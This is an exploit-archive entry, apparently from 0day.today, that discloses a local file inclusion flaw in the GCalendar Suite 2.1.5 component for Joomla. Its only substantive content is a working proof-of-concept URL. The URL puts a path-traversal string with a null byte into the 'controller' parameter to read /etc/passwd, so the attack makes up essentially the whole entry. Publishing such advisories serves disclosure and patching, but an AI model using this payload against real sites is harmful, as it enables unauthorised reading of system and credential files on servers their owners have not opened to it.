id: 11326
date: 03/15/2010
title: Joomla component com_gcalendar Suite v2.1.5 Local File Include
author: jdc
cves: 

==============================================================
Joomla component com_gcalendar Suite v2.1.5 Local File Include
==============================================================

Joomla component GCalendar Suite 2.1.5 Local File Include
Version     : 2.1.5
Author      : jdc
Download :
http://g4j.laoneo.net/content/extensions/download/doc_details/28-gcalendar-suite-215.html
 
http://site/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00
 


#  0day.today [2023-03-27]  #